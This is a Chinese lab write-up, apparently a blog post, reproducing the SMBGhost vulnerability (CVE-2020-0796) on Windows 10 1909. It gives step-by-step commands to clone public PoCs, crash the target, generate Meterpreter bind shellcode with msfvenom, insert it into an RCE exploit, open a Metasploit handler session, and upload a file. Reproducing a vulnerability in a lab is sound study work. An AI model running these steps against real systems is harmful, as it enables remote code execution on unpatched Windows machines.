• 永恒之黑漏洞复现


    永痕之黑

    1. 永恒之黑漏洞相关信息

    漏洞介绍 https://nvd.nist.gov/vuln/detail/CVE-2020-0796

    漏洞影响版本:
    Windows 10 Version 1903 for 32-bit Systems
    Windows 10 Version 1903 for x64-based Systems
    Windows 10 Version 1903 for ARM64-based Systems
    Windows Server 2016, Version 1903 (Server Core installation)
    Windows 10 Version 1909 for 32-bit Systems
    Windows 10 Version 1909 for x64-based Systems
    Windows 10 Version 1909 for ARM64-based Systems
    Windows Server 2016, Version 1909 (Server Core installation)windows 10 1909

    原理SMB远程代码执行漏洞

    SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

    Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。

    利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。

    2. 实验环境

    kali: 192.168.0.10

    win10-1909教育版:192.168.0.8

    (迅雷下载:ed2k://|file|cn_windows_10_business_editions_version_1909_updated_dec_2019_x64_dvd_262ac8af.iso|5301471232|FD9D7DD90D16FA14A682AEF49F8E712B|/)

    kali
    win10-1909

    关闭目标主机的防火墙
    在这里插入图片描述

    3. kali下载 POC和Getshell

    蓝屏POC

    git clone https://github.com/eerykitty/CVE-2020-0796-PoC
    
    • 1

    getshell

    git clone https://github.com/chompie1337/SMBGhost_RCE_PoC
    
    • 1

    在这里插入图片描述

    4. 执行蓝屏POC

    python3 CVE-2020-0796.py 192.168.0.8
    
    • 1

    在这里插入图片描述

    win10-1909蓝屏,攻击成功,说明存在漏洞。

    在这里插入图片描述

    5. getshell

    使用msfvenom命令生成shellcode代码

    msfconsole
    msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o shellcode.txt
    
    • 1
    • 2

    在这里插入图片描述
    复制shellcode.txt内容进入SMBGhost_RCE_PoC文件编辑exploit.py,将USER_PAYLOAD段全部删除,将刚刚shellcode.txt内容复制进去
    将buf改为USER_PAYLOAD
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    进入kali中的msf模块打开监听模块

    use exploit/multi/handler #选择监听模块
    set payload windows/x64/meterpreter/bind_tcp #使用监听模块
    set lport 4444  #监听端口
    set rhost 192.168.0.8  # 目标主机
    run #运行
    
    • 1
    • 2
    • 3
    • 4
    • 5

    新开一个kali的shell运行exploit.py反弹shell,可能一次执行不成功就多运行几次。

    python3 exploit.py -ip 192.168.0.8
    
    • 1

    在这里插入图片描述
    在这里插入图片描述

    可以看到msf监听模块成功建立起会话

    查看一下系统信息

    sysinfo
    
    • 1

    在这里插入图片描述

    上传kali的一个文件到win10, 获取shell

    upload /root/Desktop/flag.txt
    
    • 1

    在这里插入图片描述

    在win10 可以找到flag.txt
    在这里插入图片描述

    漏洞复现成功

  • 相关阅读:
    浏览器缓存机制概述
    exec函数族的应用
    Tomcat
    快速部署istio(入门)
    JSON数组(array)
    兴趣点飞行、地图相册、气体检测飞行 | 复亚智能新功能上线
    Java基础知识篇之类的基本概念
    Vue2 01 前端核心分析、HelloVue
    CoM-Px30|RK3358核心模块WIFI通信测试
    解读STM32串口发送的两个标志位 “USART_FLAG_TXE“ & “USART_FLAG_TC“
  • 原文地址:https://blog.csdn.net/qq_50932477/article/details/127824037